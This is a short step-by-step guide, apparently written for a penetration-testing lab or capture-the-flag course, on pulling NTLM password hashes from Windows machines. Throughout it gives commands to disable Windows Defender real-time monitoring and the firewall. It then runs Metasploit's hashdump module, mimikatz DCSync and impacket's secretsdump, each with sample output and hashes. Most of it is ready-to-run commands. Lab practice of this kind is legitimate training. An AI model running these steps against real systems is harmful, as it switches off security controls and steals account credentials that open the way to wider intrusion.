Using Metasploit-Hashdump
After getting a shell as Administrator, do the following.
First, if real-time protection is enabled, disable it (from an elevated PowerShell):
Set-MpPreference -DisableRealtimeMonitoring $true
Then disable the Windows Firewall for the current profile (this command turns off the firewall, not the antivirus; it only matters for the reverse connection):
netsh advfirewall set currentprofile state off
- get a meterpreter shell on the particular machine
Background the session with Ctrl+Z:
meterpreter >
Background session 1? [y/N] y
Load the module post/windows/gather/hashdump:
msf5 exploit(multi/handler) > use post/windows/gather/hashdump
List your background sessions:
msf5 post(windows/gather/hashdump) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                    Connection
  --  ----  ----                     -----------                    ----------
  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ MACHINE  10.10.14.X:2345 -> 10.10.10.X:49696 (10.10.10.X)
Set your session and run the module. The session must be running as NT AUTHORITY\SYSTEM (as here), because the module reads the SAM and SYSTEM registry hives to recover the boot key and decrypt the stored hashes:
msf5 post(windows/gather/hashdump) > set session 1
session => 1
msf5 post(windows/gather/hashdump) > run
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY d132fb96a18c6ee06dee89f8effb8e06...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:97fc053bc0b23588798277b22540c40d:::
[*] Post module execution completed
Each line is in pwdump format, user:RID:LM hash:NT hash:::. The first hash is the LM hash and the second is the NTLM hash. The LM value aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string, which is what you see when LM hashes are not stored at all; only the NTLM part is useful.
The NTLM hash here is 97fc053bc0b23588798277b22540c40d.
Just copy and paste the NTLM hash into the writeup where I asked for it.
Using mimikatz
After getting a shell as Administrator, do the following.
First, if real-time protection is enabled, disable it (from an elevated PowerShell):
Set-MpPreference -DisableRealtimeMonitoring $true
Then disable the Windows Firewall for the current profile (this command turns off the firewall, not the antivirus):
netsh advfirewall set currentprofile state off
Then run mimikatz with the following arguments:
./mimikatz.exe "lsadump::dcsync /user:administrator"
You can download mimikatz from Here.
Note that lsadump::dcsync does not read anything from the local machine: it asks a domain controller to replicate the account's secrets over DRSUAPI, so it only works against a domain, and only when the account you run it as has replication rights (Domain Admins have them by default).
You will get output like this:
C:\tmp> ./mimikatz.exe "lsadump::dcsync /user:administrator"
.#####. mimikatz 2.2.0 (x86) #18362 Feb 8 2020 12:26:09
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'domain.LOCAL' will be the domain
[DC] 'machine.domain.LOCAL' will be the DC server
[DC] 'administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 1/24/2020 9:14:15 AM
Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID : 500
Credentials:
Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff
The NTLM hash we got is f9485863c1e9e05851ab40cbb5ab9dff.
Just copy and paste it into the writeup where I asked for it.
Using secretsdump
If you have owned a machine and you have the Administrator password, you can get the NTLM hashes of the Administrator user with secretsdump.py, a tool from impacket. With -just-dc-ntlm it pulls only the NTLM hashes from NTDS.DIT over DRSUAPI, so the target must be a domain controller and the account must have replication rights (the same requirement as DCSync):
secretsdump.py -just-dc-ntlm domain.local/Administrator:"Mypass"@10.10.10.X
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::
The hash line is again in pwdump format: the first hash is the LM hash (the empty-string value, so no LM hash is stored) and the second one is the NTLM hash.
Here we got the NTLM hash, which is d9485863c1b9e07543aa40cbb4ab9dfd.
Just copy and paste it into the writeup where I asked for it.